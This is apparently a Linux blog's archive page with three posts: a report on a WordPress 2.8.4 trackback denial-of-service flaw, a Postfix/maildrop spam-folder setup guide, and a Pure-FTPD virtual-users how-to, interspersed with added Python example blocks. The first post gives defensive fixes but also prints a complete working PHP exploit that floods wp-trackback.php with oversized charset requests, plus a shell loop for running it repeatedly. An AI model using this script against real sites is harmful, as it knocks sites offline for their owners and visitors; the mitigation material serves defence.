Archive for category Linux

New 0-Day WordPress 2.8.4 Exploit

WordPress is vulnerable to a very dirty exploit right now as of 2.8.4. A resource-exhaustion DoS is floating around publicly at the moment. It’s a vulnerability in wp-trackback.php, and it hurts.

Here are the results of a quick test against my server:

13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24

Very dirty.

Here’s a temporary fix that can be implemented until we get a real patch.

Add the following lines to your Apache 2 config file:

<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>

Place this in the main config, not in a virtual host config. It denies every request for a file whose name contains “wp-trackback.php”, so legitimate trackbacks are blocked too. This is a quick and ugly fix, but it will help against this attack.

I expect WordPress will have an update soon.

UPDATE: With the help of a friend we have created a quick fix:

At line 47 of wp-trackback.php, add this:

if (strlen($charset) > 50)
    die();

The post shows only the condition; die() is the body that aborts the request when the charset list is longer than 50 bytes, before the title is processed.
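To show what the quick fix buys you, here is an added example (not code from the post or from WordPress) that models the length guard as a check that runs before any conversion work. The conversion step is an assumption made for illustration: the charset parameter is treated as a comma-separated list of candidate encodings tried in turn, which is how PHP's mb_convert_encoding() interprets a from-encoding list; the post itself does not describe the internals of wp-trackback.php. Sample request bodies are constructed in the block.

```python
"""Added example, not code from the post or from WordPress.

Models the post's quick fix (if(strlen($charset) > 50)) as a guard that
runs before the trackback title is converted. The conversion step is an
assumption made for illustration: the charset parameter is treated as a
comma-separated list of candidate encodings tried in turn, which is how
PHP's mb_convert_encoding() interprets a from-encoding list. The post does
not describe wp-trackback.php's internals."""
from typing import Tuple
from urllib.parse import parse_qs

MAX_CHARSET_LEN = 50   # the limit from the post's quick fix


class TrackbackRejected(Exception):
    """Raised when a request is refused before any conversion work is done."""


def convert_title(title: bytes, charset_list: str) -> Tuple[str, int]:
    """Try each comma-separated candidate encoding in order.

    Returns (decoded_title, candidates_tried). The work grows with the number
    of candidates times the size of the title, which is what an oversized
    charset list abuses."""
    tried = 0
    for candidate in charset_list.split(","):
        candidate = candidate.strip()
        if not candidate:
            continue
        tried += 1
        try:
            return title.decode(candidate), tried
        except (UnicodeDecodeError, LookupError):
            continue          # not this encoding; try the next candidate
    return title.decode("utf-8", errors="replace"), tried


def handle_trackback(body: str) -> Tuple[str, int]:
    """Parse an application/x-www-form-urlencoded trackback body and apply the
    length guard *before* the title is converted."""
    # latin-1 keeps the raw title bytes recoverable with .encode("latin-1")
    params = parse_qs(body, keep_blank_values=True, encoding="latin-1")
    charset = params.get("charset", ["utf-8"])[0]
    if len(charset) > MAX_CHARSET_LEN:
        raise TrackbackRejected("charset parameter too long")
    title = params.get("title", [""])[0].encode("latin-1")
    return convert_title(title, charset)


if __name__ == "__main__":
    # constructed sample bodies: a normal trackback and an oversized charset list
    print(handle_trackback("charset=ascii,utf-8&title=caf%C3%A9"))
    try:
        handle_trackback("charset=" + "UTF-8%2C" * 30 + "&title=A")
    except TrackbackRejected as e:
        print("rejected:", e)
```

The point is the ordering: the cheap length check sits in front of the per-candidate decode loop, so a request carrying a huge charset list is refused before the server spends any time on it.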

Here’s the actual exploit.

<?php
/*
 * wordpress Resource exhaustion Exploit
 * [email protected] contacted and get a response,
 * but no solution available.
 * [18/10/2009 20:31:00] modified by Zerial <[email protected]>
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php; done
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path[0] != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
    if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    fputs($fp, "POST $path HTTP/1.1\r\n");
    fputs($fp, "Host: ".$data['host']."\r\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    fputs($fp, "Content-length: ".strlen($str)."\r\n");
    fputs($fp, "Connection: close\r\n\r\n");
    fputs($fp, $str."\r\n\r\n");
    echo "hit!\n";
}
?>


Postfix Maildrop Spam Folder

Filtering spam in Postfix is pretty simple. There are some advanced techniques you can use, but simply setting up SpamAssassin will suit many people. One downside is seeing all the ***** SPAM ***** mails in your inbox. It took a while to come up with a solution, but the best fit so far has been using maildrop to move those messages to a Junk folder automatically. Here are the steps to set this up on a Debian 5.0 system with Postfix and SpamAssassin.

First, set up your /etc/maildroprc file:

# commands and variables for making the mail directories
# (the command paths and directory variables below are assumed for a
# Debian system with courier-maildrop; adjust them to your layout)
mkdir=/bin/mkdir
rmdir=/bin/rmdir
maildirmake=/usr/bin/maildirmake
# with "maildrop -d", $DEFAULT is the user's maildir as returned by authdaemon
MAILDIR="$DEFAULT"
_JUNK_DEST="$MAILDIR/.Junk"

# make the user's mail directory if it doesn't exist
# (mkdir -p creates the parent directories, the leaf is removed again so
# maildirmake can create a proper Maildir there)
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
    `$mkdir -p $MAILDIR`
    `$rmdir $MAILDIR`
    `$maildirmake $MAILDIR`
}

# make the .Junk folder if it doesn't exist
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0)
{
    `$maildirmake $_JUNK_DEST`
    # auto subscribe. the following works for courier-imap
    `echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`
}

# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
    exception {
        to $DEFAULT/.Junk/
    }
}

The comments clearly state what’s going on there.
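If you want to sanity-check what the rule will do with a message before wiring maildrop into Postfix, here is an added example (not part of the post) that models the X-Spam-Flag test in Python. The sample messages and the maildir path are constructed for the example. Like maildrop's /pattern/ test, which matches header lines only (the body is searched only with the :b option) and is case-insensitive unless :D is given, the check looks at the header block alone, so an "X-Spam-Flag: YES" line that only appears in the body does not move the mail; folded continuation lines are joined before matching.

```python
"""Added example, not part of the post: a Python model of the maildroprc
rule above, used to check what the filter will do with a message.
The sample messages and the maildir path are constructed here."""
import re
from typing import List

# same pattern as the maildroprc; maildrop matches case-insensitively by default
SPAM_FLAG = re.compile(r"^X-Spam-Flag:.*YES", re.IGNORECASE)


def header_lines(raw: str) -> List[str]:
    """Return the unfolded header lines: everything before the first blank line."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines: List[str] = []
    for line in head.split("\n"):
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()   # RFC 5322 folding: continuation of previous header
        else:
            lines.append(line)
    return lines


def route(raw: str, maildir: str = "/home/vmail/example.org/user") -> str:
    """Return the Maildir the message would land in under the maildroprc rule.
    The default maildir is a constructed sample path."""
    if any(SPAM_FLAG.search(h) for h in header_lines(raw)):
        return maildir + "/.Junk/"     # the `to $DEFAULT/.Junk/` branch
    return maildir + "/"               # default delivery (INBOX)


# Constructed sample messages (not real captures).
SPAM = ("From: sender@example.com\n"
        "X-Spam-Flag: YES\n"
        "X-Spam-Status: Yes, score=12.3 required=5.0\n"
        "Subject: ***** SPAM ***** cheap watches\n"
        "\n"
        "body\n")
HAM = ("From: sender@example.com\n"
       "X-Spam-Status: No, score=-1.2 required=5.0\n"
       "Subject: lunch?\n"
       "\n"
       "X-Spam-Flag: YES\n"          # only in the body: must not match
       "body\n")
FOLDED = ("From: sender@example.com\n"
          "X-Spam-Flag:\n"
          "\tYES\n"
          "Subject: folded header\n"
          "\n"
          "body\n")

if __name__ == "__main__":
    for name, msg in (("spam", SPAM), ("ham", HAM), ("folded", FOLDED)):
        print(f"{name:7s} -> {route(msg)}")
```

Because only the header block is consulted, a sender cannot push their own mail into Junk (or, more to the point, out of it) by writing header-looking lines into the body; the trailing slash on the .Junk/ destination is what tells maildrop it is a Maildir rather than an mbox file.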

Once that’s set up, go into your /etc/postfix/ and make sure the following transport entry is not commented out:

maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}

Next, set /usr/bin/maildrop setuid root. This is so maildrop can interact with authdaemon and the mail folders; maildrop is built to run that way and drops root once it knows which user it is delivering to.

#chmod +s /usr/bin/maildrop

Then add these two lines to your /etc/postfix/ file:

virtual_transport = maildrop
maildrop_destination_recipient_limit = 1

If there is another virtual_transport line, be sure to comment that out first.

Last, change the ownership of the authdaemon socket directory so that maildrop, running as vmail, can access it.

chown vmail /var/run/courier/authdaemon

And that’s all: a nice and simple way to handle all that junk mail.


Debian Pure-FTPD Virtual Users Howto

After being a dedicated Gentoo user, I’ve recently moved over to Debian, hoping to spend more time on productive tasks than on administering my servers. In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different from Gentoo’s.

I thought I’d write up a quick how-to on configuring Pure-FTPD with virtual users in Debian, as a sort of personal reference, and in the hope that someone else will be able to put it to use. And here we go...

Enable PureDB authentication:

# cd /etc/pure-ftpd/auth

# ln -s ../conf/PureDB 50pure

To disable PAM authentication and UNIX authentication so you only have virtual users:

# echo no > /etc/pure-ftpd/conf/PAMAuthentication

# echo no > /etc/pure-ftpd/conf/UnixAuthentication

That’s it.  Simple, but when coming from a single config file, this isn’t at all intuitive – at least to me.
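Since the Debian layout spreads this over a symlink and two one-word files, it is easy to end up with one of them wrong (or a dangling link after a package upgrade). Here is an added example, not from the post or the Pure-FTPD project, that checks /etc/pure-ftpd is in the state the post describes: a symlink in auth/ pointing at conf/PureDB, and conf/PAMAuthentication and conf/UnixAuthentication both containing "no". sample_tree() builds a throw-away copy of that layout so the check can be exercised without touching a real install; the pureftpd.pdb path it writes is a sample value.

```python
"""Added example, not from the post or the Pure-FTPD project: a check that
/etc/pure-ftpd ends up in the state the post describes. sample_tree() builds
a throw-away lookalike of the Debian layout for exercising the check."""
import os
import tempfile
from pathlib import Path
from typing import List, Optional


def _flag(path: Path) -> Optional[str]:
    """Read a one-word Debian pure-ftpd flag file such as conf/PAMAuthentication."""
    return path.read_text().strip().lower() if path.is_file() else None


def check_pure_ftpd_auth(etc_dir: str = "/etc/pure-ftpd") -> List[str]:
    """Return the list of deviations from the post's setup (empty means OK)."""
    base = Path(etc_dir)
    problems: List[str] = []
    auth = base / "auth"
    links = [p for p in auth.iterdir() if p.is_symlink()] if auth.is_dir() else []
    puredb = [p for p in links if os.path.basename(os.readlink(p)) == "PureDB"]
    if not puredb:
        problems.append("auth/: no symlink to conf/PureDB, so PureDB authentication is not enabled")
    elif not all(p.resolve().is_file() for p in puredb):
        problems.append("auth/: PureDB symlink is dangling (conf/PureDB missing)")
    for name in ("PAMAuthentication", "UnixAuthentication"):
        value = _flag(base / "conf" / name)
        if value != "no":
            problems.append(f"conf/{name}: expected 'no', found {value!r}")
    return problems


def sample_tree(configured: bool) -> str:
    """Build a throw-away /etc/pure-ftpd lookalike (constructed sample, not a real install).
    With configured=True the tree matches the post; otherwise it is the pre-change state."""
    base = Path(tempfile.mkdtemp()) / "pure-ftpd"
    (base / "auth").mkdir(parents=True)
    (base / "conf").mkdir()
    (base / "conf" / "PureDB").write_text("/etc/pure-ftpd/pureftpd.pdb\n")  # sample value
    flag = "no" if configured else "yes"
    (base / "conf" / "PAMAuthentication").write_text(flag + "\n")
    (base / "conf" / "UnixAuthentication").write_text(flag + "\n")
    if configured:
        os.symlink("../conf/PureDB", base / "auth" / "50pure")   # same link the post creates
    return str(base)


if __name__ == "__main__":
    for problem in check_pure_ftpd_auth() or ["pure-ftpd auth setup matches the post"]:
        print(problem)
```

Run it as root on the box after the steps above; an empty result means only PureDB virtual users can log in, which is the whole point of turning PAM and UNIX authentication off.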

I’ve always recommended Pure-FTPD for its security, features, and simplicity. You can find out more information at the official Pure-FTPD project website:
